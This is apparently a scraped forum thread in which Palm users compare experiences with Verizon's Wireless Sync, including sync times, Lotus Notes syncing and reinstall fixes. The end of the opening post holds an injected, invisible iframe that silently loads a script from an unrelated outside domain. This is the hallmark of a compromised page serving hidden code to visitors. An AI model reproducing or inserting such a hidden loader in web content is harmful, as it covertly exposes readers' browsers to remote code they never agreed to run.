Anyone here actually use Verizon's "Wireless Sync"?

I haven't seen anyone talk about this in a while.

Does anyone use Verizon's Wireless Sync? Do any of you use it with anything other than the default Address, Contact and Mail applications?

I'm really curious to see how long it takes to sync under any scenario. I had tried it awhile ago and eventually gave up.

Any new hope?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Verizon Wireless Sync

I use it to sync to Lotus Notes to mail, also can sync to ACT 6.0 and DateBk5 and all of your programs running on your desktop. BUT it can take a long time.

How long is long?

Hey there fcheh.

Out of curiousity, how long is long for you when you sync your Lotus e-mail? Or anything else for that matter?

5 minutes? 15 minutes?

I'm curious to see what others have experienced.

I use it everyday. My wireless sync is a stripped down version to get only my home email, and to sync my address and datebook for changes. It takes about 4-5 minutes to get that. It is not the most reliable, and Verizon's tech support says to uninstall and reinstall both the desktop and the Palm software when there is a problem. I have found that just reinstalling the Palm will get it running again, but it is a pain.

update...just timed a wireless sync, it was more like 2.5 minutes..just seems like 5

Lotus Notes will take about minute if you are using 1XRTT. Turn off the Hotsync system backup.
